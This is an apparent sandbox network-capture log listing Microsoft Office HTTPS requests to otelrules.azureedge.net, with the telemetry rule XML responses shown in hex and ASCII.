                                  2024-11-12 15:42:10 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  55192.168.2.44980713.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:10 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:10 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:10 GMT
                                  Content-Type: text/xml
                                  Content-Length: 475
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                  ETag: "0x8DC582BB2BE84FD"
                                  x-ms-request-id: 2a85e8ce-c01e-0066-0ca2-34a1ec000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154210Z-15869dbbcc6lq2lzhC1DFWs1sn00000001u000000000pba0
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:10 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  56192.168.2.44981013.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:10 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:10 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:10 GMT
                                  Content-Type: text/xml
                                  Content-Length: 416
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                  ETag: "0x8DC582BAEA4B445"
                                  x-ms-request-id: ab75edf1-a01e-003d-1da8-3498d7000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154210Z-15869dbbcc6vr5dxhC1DFWyw4g0000000200000000004p79
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:10 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  57192.168.2.44981313.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:11 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:11 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:11 GMT
                                  Content-Type: text/xml
                                  Content-Length: 471
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                  ETag: "0x8DC582B97E6FCDD"
                                  x-ms-request-id: 8d9254fb-301e-005d-42a5-34e448000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154211Z-15869dbbcc62nmdhhC1DFW2sxs00000006dg000000007gw8
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:11 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  58192.168.2.44981213.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:11 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:11 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:11 GMT
                                  Content-Type: text/xml
                                  Content-Length: 415
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                  ETag: "0x8DC582BA80D96A1"
                                  x-ms-request-id: 81840efa-e01e-0085-3c5a-32c311000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154211Z-16547b76f7f9bs6dhC1DFWt3rg0000000fq000000000pf9e
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:11 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  59192.168.2.44981413.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:11 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:11 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:11 GMT
                                  Content-Type: text/xml
                                  Content-Length: 419
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                  ETag: "0x8DC582B9C710B28"
                                  x-ms-request-id: d07841a0-401e-0064-490f-2d54af000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154211Z-16547b76f7f4k79zhC1DFWu9y00000000fwg00000000c58s
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:11 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  60192.168.2.44981113.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:11 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:11 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:11 GMT
                                  Content-Type: text/xml
                                  Content-Length: 479
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                  ETag: "0x8DC582B989EE75B"
                                  x-ms-request-id: 270f50c7-901e-0048-6ea3-34b800000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154211Z-15869dbbcc6ss7fxhC1DFWq6vs000000099g000000005c7a
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:11 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  61192.168.2.44981613.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:12 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:12 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:12 GMT
                                  Content-Type: text/xml
                                  Content-Length: 419
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                  ETag: "0x8DC582BB7F164C3"
                                  x-ms-request-id: df0f13af-501e-00a3-0ca5-34c0f2000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154212Z-17df447cdb5rnd49hC1DFWgmpw00000006hg000000004r0n
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:12 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  62192.168.2.44981513.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:12 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:12 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:12 GMT
                                  Content-Type: text/xml
                                  Content-Length: 477
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                  ETag: "0x8DC582BA54DCC28"
                                  x-ms-request-id: 4a1cb9ec-a01e-0021-5a00-2d814c000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154212Z-16547b76f7f76p6chC1DFWctqw0000000fw000000000kgta
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:12 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  63192.168.2.44981713.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:12 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:12 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:12 GMT
                                  Content-Type: text/xml
                                  Content-Length: 477
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                  ETag: "0x8DC582BA48B5BDD"
                                  x-ms-request-id: d8b4455b-a01e-0002-69a6-345074000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154212Z-17df447cdb54ntx4hC1DFW2k400000000cng000000003g3v
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:12 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  64192.168.2.44981813.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:12 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:12 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:12 GMT
                                  Content-Type: text/xml
                                  Content-Length: 419
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                  ETag: "0x8DC582B9FF95F80"
                                  x-ms-request-id: 29e284b5-001e-0065-5703-2d0b73000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154212Z-16547b76f7f775p5hC1DFWzdvn0000000fxg000000000w3c
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:12 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  65192.168.2.44982013.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:13 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:14 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:14 GMT
                                  Content-Type: text/xml
                                  Content-Length: 485
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                  ETag: "0x8DC582BB9769355"
                                  x-ms-request-id: 9ba15ece-101e-0034-5d08-2c96ff000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154213Z-16547b76f7ftdm8dhC1DFWs13g0000000fs000000000hmd7
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
